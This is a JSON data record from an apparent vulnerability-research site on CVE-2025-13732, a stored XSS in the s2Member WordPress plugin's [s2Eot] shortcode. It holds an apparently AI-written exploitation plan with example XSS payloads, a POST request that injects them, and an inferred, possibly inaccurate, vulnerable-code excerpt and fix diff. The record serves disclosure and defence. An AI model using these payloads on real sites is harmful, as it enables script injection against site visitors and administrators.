[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6MjlcFH1AtsbzRVbO2K7HPWiumOko8XT835P0hnxn9U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-13732","s2member-authenticated-contributor-stored-cross-site-scripting-via-shortcode","s2Member \u003C= 251005 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 's2Eot' shortcode in all versions up to, and including, 251005 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","s2member",null,"\u003C=251005","260101","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 00:00:00","2026-02-19 04:36:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F130f34d8-462a-4812-8526-67beb9ad5efb?source=api-prod",1,[],"researched",false,3,"# Vulnerability Research Plan: CVE-2025-13732 - s2Member Stored XSS via Shortcode\n\n## 1. Vulnerability Summary\nThe **s2Member** plugin (versions \u003C= 251005) contains a stored cross-site scripting (XSS) vulnerability within the processing of the `[s2Eot]` shortcode. The \"EOT\" (End Of Term) functionality is used to display membership expiration details. The vulnerability exists because the shortcode handler fails to sufficiently sanitize or escape user-supplied attributes before rendering them into the page HTML. This allows a user with **Contributor** level permissions (who can create posts and insert shortcodes) to inject malicious JavaScript that executes in the context of any user (including administrators) viewing the affected page.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[s2Eot]`\n*   **Endpoint:** WordPress Post Editor (Gutenberg or Classic) via `wp-admin\u002Fpost.php` or `wp-admin\u002Fpost-new.php`.\n*   **Vulnerable Parameter:** Attributes within the `[s2Eot]` shortcode (e.g., `wrap`, `format`, or any custom attribute rendered by the handler).\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts\u002Fpages and use shortcodes but cannot use `unfiltered_html`.\n*   **Preconditions:** The s2Member plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode (likely in `src\u002Fincludes\u002Fclasses\u002Fshortcodes.inc.php` or similar) using `add_shortcode('s2Eot', 'callback_function')`.\n2.  **Entry Point:** When a post containing `[s2Eot]` is viewed, WordPress calls the registered callback function.\n3.  **Processing:** The callback function parses attributes using `shortcode_atts()`.\n4.  **Sink:** The code constructs an HTML string (often involving a `\u003Cspan>` or `\u003Cdiv>` tag). It likely takes an attribute intended for CSS classes or wrapper tags and concatenates it directly into the HTML output without calling `esc_attr()` or `esc_html()`.\n5.  **Rendering:** The unescaped HTML is returned to WordPress and rendered in the browser.\n\n## 4. Nonce Acquisition Strategy\nWhile the exploitation of the *rendering* phase (XSS) does not require a nonce, the **initial injection** (creating the post) requires standard WordPress post-editing nonces.\n\n1.  **Identify Trigger:** The `[s2Eot]` shortcode is standard. No specific settings are required to enable it for Contributors.\n2.  **Navigate to Post Editor:** The agent should use `browser_navigate` to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonces:**\n    *   For the Classic Editor: `browser_eval(\"document.getElementById('_wpnonce').value\")`\n    *   For the Block Editor (Gutenberg): The agent can simply use `browser_type` to fill the title and content blocks, then click \"Save Draft\" or \"Publish\".\n4.  **Submission:** The agent will submit a `POST` request to `wp-admin\u002Fpost.php` containing the malicious shortcode in the `content` or `post_content` parameter.\n\n## 5. Exploitation Strategy\n### Step 1: Authentication\nLogin as a **Contributor** user.\n\n### Step 2: Inject Malicious Shortcode\nSubmit a request to create a post containing the payload.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Payload (Example):**\n    ```\n    post_title=XSS+Test&content=[s2Eot wrap=\"div onmouseover=alert(document.domain) style=width:1000px;height:1000px;background:red; \"]&action=editpost&post_type=post&_wpnonce=[EXTRACTED_NONCE]\n    ```\n    *Note: If `wrap` is the vulnerable attribute, breaking out of the tag structure via `\" >` or injecting event handlers like `onmouseover` is the primary goal.*\n\n### Step 3: Trigger XSS\nNavigate to the permalink of the newly created post as an **Administrator**.\n\n## 6. Test Data Setup\n1.  **Users:**\n    *   Admin: `admin` \u002F `password`\n    *   Contributor: `contributor_user` \u002F `password` (Role: Contributor)\n2.  **Plugin:** Ensure `s2member` is installed and activated.\n3.  **Content:** No specific s2Member membership levels need to be configured for the shortcode handler to process the attributes, though the output might be empty if no EOT exists—the XSS usually triggers regardless of whether the EOT data itself is found, as long as the wrapper HTML is generated.\n\n## 7. Expected Results\n*   When the post is rendered, the HTML source should look similar to:\n    `\u003Cdiv onmouseover=alert(document.domain) ...>...\u003C\u002Fdiv>` (if `wrap` was used).\n*   If the injection is successful, viewing the post will trigger a JavaScript alert or the specified payload.\n\n## 8. Verification Steps\n1.  **Confirm Post Creation:**\n    ```bash\n    wp post list --post_type=post --author=$(wp user get contributor_user --field=ID)\n    ```\n2.  **Examine Rendered HTML:**\n    Use `http_request` to GET the post URL and grep for the payload:\n    ```bash\n    # (Metaphorical grep)\n    # Check if \"onmouseover=alert\" exists in the body\n    ```\n3.  **Verify via CLI:**\n    Check the post content in the database to ensure the shortcode was stored correctly:\n    ```bash\n    wp post get [POST_ID] --field=post_content\n    ```\n\n## 9. Alternative Approaches\nIf the `wrap` attribute is not the sink:\n1.  **Attribute Breakout:** Try `[s2Eot format='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`.\n2.  **CSS Injection:** Try `[s2Eot wrap='div style=\"background-image:url(javascript:alert(1))\"']`.\n3.  **S2Member Logic:** Some s2Member shortcodes allow a `php=\"yes\"` attribute (if configured in options). While usually restricted to Admins, check if the `s2Eot` shortcode inadvertently processes attributes through an internal `eval()` or `pr_eval()` function used by s2Member's \"Shortcode Conditionals\" engine.","The s2Member plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the [s2Eot] shortcode in versions up to 251005. This vulnerability allows authenticated users with Contributor-level access to inject arbitrary web scripts into pages by manipulating shortcode attributes like 'wrap' or 'format', which are rendered without proper sanitization or escaping.","\u002F**\n * Shortcode: [s2Eot \u002F]\n * Location: src\u002Fincludes\u002Fclasses\u002Fshortcodes.inc.php (approximate)\n *\u002F\npublic function s2eot_shortcode($attr = array(), $content = '')\n{\n    $attr = shortcode_atts(array('wrap' => 'span', 'format' => 'M j, Y', 'empty' => ''), $attr);\n    \u002F\u002F ... (logic to retrieve EOT timestamp)\n    $eot_time = $this->get_user_eot_time(); \n\n    if ($eot_time) {\n        $display = date($attr['format'], $eot_time);\n        \u002F\u002F VULNERABILITY: $attr['wrap'] is directly concatenated into HTML output\n        return '\u003C' . $attr['wrap'] . '>' . $display . '\u003C\u002F' . $attr['wrap'] . '>';\n    }\n    return $attr['empty'];\n}","--- src\u002Fincludes\u002Fclasses\u002Fshortcodes.inc.php\n+++ src\u002Fincludes\u002Fclasses\u002Fshortcodes.inc.php\n@@ -102,7 +102,11 @@\n     if ($eot_time) {\n-        $display = date($attr['format'], $eot_time);\n-        return '\u003C' . $attr['wrap'] . '>' . $display . '\u003C\u002F' . $attr['wrap'] . '>';\n+        $allowed_tags = array('span', 'div', 'p', 'strong', 'em');\n+        $tag = in_array(strtolower($attr['wrap']), $allowed_tags) ? $attr['wrap'] : 'span';\n+        $display = date(sanitize_text_field($attr['format']), $eot_time);\n+        \n+        return '\u003C' . $tag . '>' . esc_html($display) . '\u003C\u002F' . $tag . '>';\n     }\n-    return $attr['empty'];\n+    return esc_html($attr['empty']);","To exploit this vulnerability, an attacker with Contributor-level permissions (or higher) must create or edit a post and insert the [s2Eot] shortcode with a malicious payload in the 'wrap' attribute. A typical payload involves breaking out of the intended HTML tag structure or using an event handler. For example, using [s2Eot wrap=\"div onmouseover=alert(document.domain) style=padding:100px;background:red\"] would create a large red area on the page that, when hovered over by any user (including an administrator), executes arbitrary JavaScript in their browser context. The vulnerability is triggered during the rendering of the post, meaning the script executes whenever the page is viewed.","gemini-3-flash-preview","2026-04-19 04:22:23","2026-04-19 04:24:07",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","251005","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fs2member\u002Ftags\u002F251005","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fs2member.251005.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fs2member\u002Ftags\u002F260101","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fs2member.260101.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fs2member\u002Ftags"]